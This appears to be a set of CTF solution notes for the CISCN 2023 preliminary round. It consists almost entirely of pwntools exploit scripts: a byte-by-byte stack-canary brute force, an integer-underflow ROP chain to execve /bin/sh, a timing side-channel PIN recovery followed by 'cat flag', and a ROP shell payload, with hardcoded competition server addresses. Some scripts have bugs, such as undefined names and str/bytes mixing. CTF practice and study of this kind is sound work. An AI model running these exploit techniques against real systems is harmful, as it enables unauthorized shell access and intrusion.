CISCN2023初赛复现

funcanary

from pwn import *
import binascii
context.log_level = 'debug'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
local = 1
elf = ELF('./funcanary')
def db():
    if (local):
        gdb.attach(p)


def exp():
    global p
    if local:
        p = process('./funcanary')

    else:
        p = remote('47.94.206.10',13858)
    p.recvuntil('welcome\n')
    canary = b'\x00'
    for k in range(7):
        for i in range(256):
            print ("the " + str(k) + ": " + chr(i))
            p.send('a'*104 + canary + chr(i))
            a = p.recvuntil("welcome\n")
            print (a)
            if "fun" in a:
                    canary += chr(i)
                    print ("canary: " + canary)
                    break

    hex_str = binascii.hexlify(canary).decode('utf-8')
    hex_num = int(hex_str, 16)
    canary1= hex(hex_num)
    print(canary1)
    yuan = 1329
    flag_1 = 0x001228
    pl = b'a'*104+canary+'a'*8+'\x28'+'\x72'
    print(pl)
    p.send(pl)
    a=p.recv(timeout=0.5)
    print(a)
    if 'flag' in a:
            p.interactive()
    return
if __name__ == '__main__':
    while True:
        try:
            exp()
            continue
        except KeyboardInterrupt:
            break
        except EOFError:
            continue

烧烤

# -*- coding=utf-8 -*-
#!/usr/bin/env python3
# A script for pwn exp
#解提思路    先格式化字符串泄露，然后rop
from pwn import *
import os
import sys

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

LOCAL = 0
LIBC = 0
elf_path = './shaokao'
libc_path = './libc.so.61'
code = ELF(elf_path)
context.arch=code.arch


r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

if (len(sys.argv) < 2):
    LOCAL = 1
    context.log_level = 'debug'
elif len(sys.argv) == 1:
    print ("Welcome to  c0ke's simplified pwntools template!!!")
    print ("Usage : \n")
    print ("       python mode.py HOST:PORT\n ")
    exit()
else:
    context.log_level = 'debug'
    server_ip = sys.argv[1].split(':')[0]
    server_port = int(sys.argv[1].split(':')[1])


# --------------------------func-----------------------------
def db():
    if (LOCAL):
        gdb.attach(io)


def cat_flag():
    flag_header = b'flag{'
    sleep(1)
    sl('cat flag')
    ru(flag_header)
    flag = flag_header + ru('}') + b'}'
    exit(0)


# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    se(1)
    sla("3. 勇闯天涯\n",'3')
    sla("来几瓶？\n","-100000")
    se(4)
    se(5)
#0x000000000040264f : pop rdi ; ret
#0x000000000040a67e : pop rsi ; ret
#0x00000000004a404a : pop rax ; pop rdx ; pop rbx ; ret
#0x0000000000402404 : syscall
    name = 0x0000000004E60F0
    pop_rdi = 0x000000000040264f
    pop_rsi = 0x000000000040a67e
    pop_rax_rdx_rbx = 0x00000000004a404a
    sysacall = 0x0000000000402404
    pl = "/bin/sh\x00"+(32-8)*b"a"+b'b'*8+p64(pop_rdi)+p64(name)+p64(pop_rsi)+p64(0)+p64(pop_rax_rdx_rbx)+p64(0x3b)+p64(0)*2+p64(sysacall)
    sla("烧烤摊儿已归你所有，请赐名：\n",pl)
    



def se(x):
    sla("> ",str(x))

def finish():
    ia()
    c()


# --------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env={"LD_PRELOAD": libc_path})
        else:
            io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

Login

from pwn import *
from sys import argv
context(os='linux',arch='amd64',log_level='debug')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def ru(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))


def getpin(pin):
	subtime = -1
	res =''
	for c in a:
		pin_o = pin+c+'0'*(7-len(pin))
		sum=0
		for _ in range(10):
			ru('>')
			sl(b'3')
			ru(b"PIN code: ")
			start=time.time()
			sl(pin_o)
			rev=ru(b'\n')
			if b"Wrong PIN code" in rev:
				pass
			else:
				print(pin_0)
				break
			end=time.time()
			sum+=(end-start)
		print(cur,sum)
		avgtime=sum
		if(avgtime>subtime):
			subtime=avgtime
			res=c
	return res
a='0123456789'
p= remote("123.56.238.150",45118)
pin=''
for i in range(8):
	pin+=getpin(pin)
	print("PIN:",pin)
ru(b'>')
sl(b'2')
ru(b'PASSWD')
sl(b"123456")
ru(b'$')
sl(b"cat flag")
p.interactive()
#flag{d39a1013-e066-4d64-8558-4a5855fb7303}   pin code : 54730891
			

shellwego

from pwn import *
context.log_level="debug"
p=process("./pwn")
#p=remote("node4.anna.nssctf.cn",28486)

p.recvuntil("$ ")
p.sendline("cert nAcDsMicN S33UAga1n@#!")
p.recvuntil("# ")

pop_rdi=0x0000000000444fec
pop_rsi=0x000000000041e818
pop_rdx=0x000000000049e11d
pop_rax=0x000000000040d9e6
able_syscall=0x463738

rop=b""
rop+=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(0x5A2BA0+0xa00)+p64(pop_rdx)+p64(0x100)+p64(pop_rax)+p64(0)+p64(able_syscall)
rop+=p64(pop_rdi)+p64(0x5A2BA0+0xa00)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(pop_rax)+p64(59)+p64(pop_rsi)+p64(0)+p64(able_syscall)
payload=b"echo "
payload+=b"+ "*(0x290-0x60+3-0x10)+rop
p.sendline(payload)
p.sendline("/bin/sh\x00")

p.interactive()